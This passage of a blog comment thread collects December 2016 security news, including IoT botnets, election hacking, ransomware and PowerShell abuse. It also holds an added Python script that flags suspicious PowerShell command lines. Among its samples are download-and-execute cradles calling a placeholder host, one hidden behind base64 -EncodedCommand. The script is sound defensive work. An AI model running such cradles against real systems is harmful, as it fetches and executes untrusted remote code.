“Jesus christ,” said Darren Martyn, a security researcher who’s been tracking the recent wave of cyberattacks coming from hacked Internet of Things devices infected with Mirai. “Assuming [the hackers] didn’t fuck up repacking the firmware, and they didn’t do anything spectacularly stupid when backdooring it, their firmware backdoors will probably work just fine.”
None of the security researchers I contacted, however, could find one of the hacked routers in the wild.
“[It] would mean patching firmware for each different model and possibly even for each ISP,” he told Motherboard in an online chat. “Some firmware takes 15 minutes to patch, other can take days. But it is easy to mess up.”
Tomi Engdahl says:
Ben Sisario / New York Times:
US Congress passes bill seeking to ban ticket-scalping bots by making it illegal to circumvent the security measures of ticketing websites — With public attention focused on the scourge of online ticket scalping, Congress has passed a bill outlawing bots, or computer programs that let users scoop …
Congress Moves to Curb Ticket Scalping, Banning Bots Used Online
http://www.nytimes.com/2016/12/08/business/media/ticket-scalping-bots-act.html
With public attention focused on the scourge of online ticket scalping, Congress has passed a bill outlawing bots, or computer programs that let users scoop up the best tickets and resell them at inflated prices.
But will this law be enough to tame an $8 billion secondary ticket market that is increasingly global?
On Wednesday, the House of Representatives passed the Better Online Ticket Sales Act, or BOTS Act, with bipartisan support, following the bill’s passage a week ago in the Senate. It will now go to the White House for President Obama’s signature.
“With this soon-to-be-new law that will eliminate ‘bots’ and slap hackers with a hefty fine, we can now ensure those who want to attend shows in the future will not have to pay outrageous, unfair prices,” Mr. Schumer said in a statement.
Tomi Engdahl says:
Creating hacks for online games could now earn you jail time in South Korea
http://www.pcgamer.com/south-korea-makes-cheating-in-online-games-an-actual-crime/
South Korea has taken a big step toward cracking down on cheating in online games by criminalizing the creation and distribution of aimbots, wall hacks, and anything else not allowed by a game’s terms of service. According to a PvPLive report, anyone convicted of doing so could face up to five years in prison (!) or $43,000 in fines.
The law apparently doesn’t target esports specifically, although that would seem to be its most obvious target, given how popular (and lucrative) they are, especially in South Korea. And game makers like Valve, Blizzard, and Riot will no doubt welcome the new law as another weapon to use in their fight against cheaters.
Even so, I don’t see how anyone could possibly consider this a good idea. We can’t properly judge without a full translation of the law, but criminalizing the creation of cheating software, as opposed to profiting in some specific way through cheating, potentially leads to all sorts of unintended consequences. It also opens up the door to abuse on the developer side of the equation. If anything that contravenes a game’s TOS is against the law, aren’t developers incentivized to load those terms with restrictive language? Modding of any sort, regardless of intent or result, could suddenly be forbidden, under penalty of law.
South Korea Passes Bill to Directly Punish Hack Makers
https://pvplive.net/c/south-korea-passes-bill-to-directly-punish-hack-ma
The South Korean parliament has passed an amendment to a law on promoting the gaming industry. Based on this law, manufacturing and distributing programs that are not allowed by the game company and its Terms of Service is now directly illegal.
That would include aimbotters, hacking programs, scripters, or anything not allowed by the ToS.
The punishment? A maximum of 5 years jail time or $43,000 in fines (50 million KRW).
Now gaming companies won’t have to rely on ‘indirect’ laws in order to sue and accuse hack/script makers and distributors – which should make life immensely easier for Riot Korea and Blizzard Korea.
Tomi Engdahl says:
Secret CIA assessment says Russia was trying to help Trump win White House
https://www.washingtonpost.com/world/national-security/obama-orders-review-of-russian-hacking-during-presidential-campaign/2016/12/09/31d6b300-be2a-11e6-94ac-3d324840106c_story.html?utm_term=.19178e78c978
The CIA has concluded in a secret assessment that Russia intervened in the 2016 election to help Donald Trump win the presidency, rather than just to undermine confidence in the U.S. electoral system, according to officials briefed on the matter.
Intelligence agencies have identified individuals with connections to the Russian government who provided WikiLeaks with thousands of hacked emails from the Democratic National Committee and others, including Hillary Clinton’s campaign chairman, according to U.S. officials.
U.S. investigating potential covert Russian plan to disrupt November elections
https://www.washingtonpost.com/world/national-security/intelligence-community-investigating-covert-russian-influence-operations-in-the-united-states/2016/09/04/aec27fa0-7156-11e6-8533-6b0b0ded0253_story.html?utm_term=.0a8e4ed4abcd
U.S. intelligence and law enforcement agencies are investigating what they see as a broad covert Russian operation in the United States to sow public distrust in the upcoming presidential election and in U.S. political institutions, intelligence and congressional officials said.
The aim is to understand the scope and intent of the Russian campaign, which incorporates cyber-tools to hack systems used in the political process, enhancing Russia’s ability to spread disinformation.
Tomi Engdahl says:
Russia intervened to help Trump win election: intelligence officials
http://www.reuters.com/article/us-usa-election-cyber-russia-idUSKBN13Z05B
U.S. intelligence analysts have concluded that Russia intervened in the 2016 election to help President-elect Donald Trump win the White House, and not just to undermine confidence in the U.S. electoral system, a senior U.S. official said on Friday.
U.S. intelligence agencies have assessed that as the 2016 presidential campaign progressed, Russian government officials devoted increasing attention to assisting Trump’s effort to win the election, the U.S. official familiar with the finding told Reuters on Friday night, speaking on condition of anonymity.
The president-elect’s transition office released a statement that exaggerated his margin of victory and attacked the U.S. intelligence community that Trump will soon command, but did not address the analysts’ conclusion.
“These are the same people that said Saddam Hussein has weapons of mass destruction,” the statement said. “The election ended a long time ago in one of the biggest Electoral College victories in history. It’s now time to move on and ‘Make America Great Again.’”
Tomi Engdahl says:
Germany sees rise in Russian propaganda, cyber attacks
http://www.reuters.com/article/us-germany-russia-idUSKBN13X15D
Germany’s domestic intelligence agency on Thursday reported a striking increase in Russian propaganda and disinformation campaigns aimed at destabilizing German society, and targeted cyber attacks against political parties.
“We see aggressive and increased cyber spying and cyber operations that could potentially endanger German government officials, members of parliament and employees of democratic parties,” Hans-Georg Maassen, head of the BfV spy agency, said in statement.
Tomi Engdahl says:
Cyber is still not taken seriously
Business management has still not taken cyber threats seriously enough, says a Deloitte survey. According to CIOs, company management sees cyber security only as a cost or a regulatory compliance matter. The attitude is also reflected in a low level of investment.
According to Deloitte's survey, business expectations and investments in cyber security are in sharp contrast with each other. Business management expects cyber security capability from IT management right after business process development, cost reduction and maintenance of IT systems.
One third of IT directors say that business management sees cyber security only as a cost or a regulatory compliance issue. This is also reflected in investments: 41 percent of CIOs believe that their organization does not invest enough in cyber security. At the same time, almost half (45%) of IT managers expect cyber security to have a significant impact on the organization's business over the next two years. Perhaps for the same reason, 64% of IT managers expect their technology budget to grow in order to strengthen cyber security.
- When a cyber threat or intrusion materializes, it is always a business problem, because it harms both business performance and reputation. The CIO must help business leadership understand what cyber security and cyber threats mean in practice.
- For business management, customers are the most important thing, and cyber security has a key role in this. When an organization is able to demonstrate how it protects, for example, customer data against potential cyber-attacks, it strengthens customer confidence in the organization even further.
Source: http://etn.fi/index.php?option=com_content&view=article&id=5564:kyberuhkia-ei-vielakaan-oteta-vakavasti&catid=13&Itemid=101
Tomi Engdahl says:
NSA’s Best Are ‘Leaving In Big Numbers,’ Insiders Say
https://yro.slashdot.org/story/16/12/10/2148243/nsas-best-are-leaving-in-big-numbers-insiders-say
Low morale at the National Security Agency is causing some of the agency’s most talented people to leave in favor of private sector jobs, former NSA Director Keith Alexander told a room full of journalism students, professors and cybersecurity executives Tuesday. The retired general and other insiders say a combination of economic and social factors, including negative press coverage, have played a part… “I am honestly surprised that some of these people in cyber companies make up to seven figures. That’s five times what the chairman of the Joint Chiefs of Staff makes. Right? And these are people that are 32 years old. Do the math. [The NSA] has great competition,” he said.
Tomi Engdahl says:
Security Experts Warn Congress That the Internet of Things Could Kill People
https://www.technologyreview.com/s/603015/security-experts-warn-congress-that-the-internet-of-things-could-kill-people/?utm_campaign=internal&utm_medium=homepage&utm_source=features_1
Poorly secured webcams and other Internet-connected devices are already being used as tools for cyberattacks. Can the government prevent this from becoming a catastrophic problem?
Tomi Engdahl says:
New Ransomware Offers The Decryption Keys If You Infect Your Friends
https://it.slashdot.org/story/16/12/12/0457218/new-ransomware-offers-the-decryption-keys-if-you-infect-your-friends
MalwareHunterTeam has discovered “Popcorn Time,” a new in-development ransomware with a twist. Gumbercules!! writes:
“With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key,” writes Bleeping Computer. Infected victims are given a “referral code” and, if two people are infected by that code and pay up — the original victim is given their decryption key (potentially).
New Scheme: Spread Popcorn Time Ransomware, get chance of free Decryption Key
https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/
Tomi Engdahl says:
IoT devices terrorize online: “In this we have been lazy, stupid or indifferent”
IoT is now going through the same phase that home PCs went through when they were introduced: basic users do not comprehend the need for security, Futurice expert Kirsi Louhelainen estimates.
IoT's weak security was revealed in late October, when the DNS service provider Dyn was hit by a denial of service attack from the Mirai botnet, which had hijacked IoT devices.
According to Louhelainen, the solutions should come from manufacturers. For example, the Mirai botnet used device default passwords that users have not even been able to change. Technology security is not a closed issue.
Source: http://www.tivi.fi/Kaikki_uutiset/iot-laitteet-hyokkailevat-verkossa-tassa-on-oltu-laiskoja-tyhmia-tai-valinpitamattomia-6606535
Tomi Engdahl says:
David E. Sanger / New York Times:
Sources: Russia hacked Republican National Committee’s systems too but didn’t release data, US intelligence agencies have concluded with “high confidence” — Washington — President Obama has ordered American intelligence agencies to produce a full report on Russian efforts …
Russian Hackers Acted to Aid Trump in Election, U.S. Says
http://www.nytimes.com/2016/12/09/us/obama-russia-election-hack.html
American intelligence agencies have concluded with “high confidence” that Russia acted covertly in the latter stages of the presidential campaign to harm Hillary Clinton’s chances and promote Donald J. Trump, according to senior administration officials.
They based that conclusion, in part, on another finding — which they say was also reached with high confidence — that the Russians hacked the Republican National Committee’s computer systems in addition to their attacks on Democratic organizations, but did not release whatever information they gleaned from the Republican networks.
Tomi Engdahl says:
Russia Says Thwarted Fresh Cyber Attacks on Major Banks
http://www.securityweek.com/russia-says-thwarted-fresh-cyber-attacks-major-banks
Russia’s telecom operator on Friday said that it had blocked a series of cyber attacks on the country’s leading banks this week, the latest to target the country’s financial sector.
Rostelecom said in a statement that it “successfully thwarted DDoS (distributed denial of service) on the five biggest banks and financial organisations in Russia” on December 5.
“The most sustained attack lasted more than two hours,” it said.
Tomi Engdahl says:
Most External PowerShell Scripts Are Malicious: Symantec
http://www.securityweek.com/most-external-powershell-scripts-are-malicious-symantec
PowerShell, the scripting language and shell framework that is installed by default on most Windows computers, is becoming a favored attack tool for malware infections. In fact, over 95% of scripts using PowerShell were found to be malicious, according to a new report from Symantec.
The flexibility of the framework allows attackers to abuse it to download malicious payloads, perform reconnaissance operations, or traverse across networks. And with 95.4% of the PowerShell scripts that Symantec analyzed being malicious, it’s clear that they represent a major threat to both consumers and businesses (especially when externally sourced PowerShell scripts are involved).
https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious
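As an added example (not from the page above and not Symantec's detection logic), here is a small Python triage routine for PowerShell command lines as captured by process-creation logging (Windows event 4688 or Sysmon event 1). It scores the abuse patterns the article lists, download cradles, hidden windows, execution-policy bypass and base64 -EncodedCommand payloads, and it decodes the encoded form (PowerShell expects UTF-16LE text in base64) so the cradle hidden inside the blob is scanned as well. The sample command lines, indicator weights and threshold are constructed for illustration; tune them against your own baseline of legitimate admin scripts before relying on them.

```python
"""Heuristic triage of PowerShell command lines as captured by process-creation
logging (Windows event 4688 or Sysmon event 1).  Added example for this page;
it is not Symantec's detection logic.  All command lines, weights and the
threshold below are constructed for illustration."""
import base64
import re

# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc, ...) followed
# by a base64 blob.
ENCODED_RE = re.compile(
    r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Abuse patterns the article names: fetching payloads, running text as code,
# hiding the window and bypassing execution policy.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
        r"|Start-BitsTransfer", re.IGNORECASE),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.IGNORECASE),
    "encoded_command": ENCODED_RE,
}
WEIGHTS = {"download_cradle": 3, "invoke_expression": 2, "hidden_window": 2,
           "policy_bypass": 2, "encoded_command": 2, "no_profile": 1,
           "non_interactive": 1}
THRESHOLD = 4  # constructed value; calibrate against your own admin scripts


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand, or None if absent or
    malformed.  PowerShell expects base64 over UTF-16LE text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline):
    """Score one command line.  The decoded payload is scanned too, because
    the download cradle usually sits inside the base64 blob."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    hits = sorted(name for name, rx in INDICATORS.items()
                  if any(rx.search(t) for t in texts))
    score = sum(WEIGHTS[h] for h in hits)
    return {"score": score, "hits": hits, "decoded": decoded,
            "verdict": "suspicious" if score >= THRESHOLD else "benign"}


def encode_for_powershell(script):
    """Produce the base64 form that PowerShell's -EncodedCommand accepts."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines: a routine admin query, a plain-text download
# cradle, and the same cradle hidden behind -EncodedCommand.
SAMPLES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq \'Running\'"',
    'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
    '.DownloadString(\'http://example.invalid/a.ps1\')"',
    "powershell.exe -NonI -W Hidden -Enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')"),
]


def triage_all(cmdlines=SAMPLES):
    """Verdict for each command line, in order."""
    return [triage(c)["verdict"] for c in cmdlines]


if __name__ == "__main__":
    for line in SAMPLES:
        r = triage(line)
        print(r["verdict"], r["score"], r["hits"])
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The first sample scores only the harmless -NoProfile switch and stays benign; the other two reach the same score whether the cradle is in the clear or base64-wrapped, which is the point of decoding before matching. A real deployment would feed this the command-line field from your log pipeline and treat the score as a triage hint, not a verdict.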
Tomi Engdahl says:
Zero to One Security Innovation
http://www.securityweek.com/zero-one-security-innovation
The increasing volume and sophistication of cyberattacks over the last few years has resulted in millions of dollars of investments in new cybersecurity startups, in more and more security tools created by cybersecurity companies and in huge investments in these new security solutions by enterprises.
To try to get a handle on all these new tools, enterprises have needed to invest in more and more security employees to deploy, manage and analyze the security data being generated – creating what we call a “big data problem.” An enormous investment in time and money managing these growing security forces naturally followed.
Although some will not admit it, these investments have by and large generated chaos where we need clarity and clumsiness where we need agility.
Although all security vendors and service providers are trying to innovate and develop new solutions that are more successful at thwarting advanced threats, if we look at the success rate of attackers vs. dollars spent by the defenders, it seems that attackers are still innovating at a faster pace – the mouse seems to be scurrying faster than the cat in this cat and mouse game.
Here’s the crux of the problem: new security tools and features represent incremental innovation, not paradigmatic changes.
A true value innovation in the today’s cybersecurity arena should include three things:
• Simplicity in a world of complex, slow and static defense architectures
• A nimble, adaptive and programmable security apparatus (as opposed to a new product or product improvement)
• The ability to utilize crowd intelligence seamlessly
Zero to one innovations would entail that defenders put the cat ahead of the mouse, i.e. create security solutions faster than the attackers do, independent of security vendors.
Tomi Engdahl says:
Cyber Insurance Market to Top $14 Billion by 2022: Report
http://www.securityweek.com/cyber-insurance-market-top-14-billion-2022-report
The global cyber insurance market is expected to generate $14 billion by 2022, according to a new report published by Allied Market Research (AMR). That figure represents an impressive compound annual growth rate (CAGR) of nearly 28% from 2016 to 2022.
North America constituted the largest cyber insurance market share in 2015, which is expected to dominate the market during the forecast period.
“Increase in awareness about cyber risks from boardroom to data centers owing to the rising number of cyber-attacks in the past 2-3 years is the prime factor that drives the market,” the report explains. “However, complex and changing nature of cyber risks limits cyber insurance market growth. Low market penetration of cyber insurance policies in developing countries offers promising business opportunity for market players.”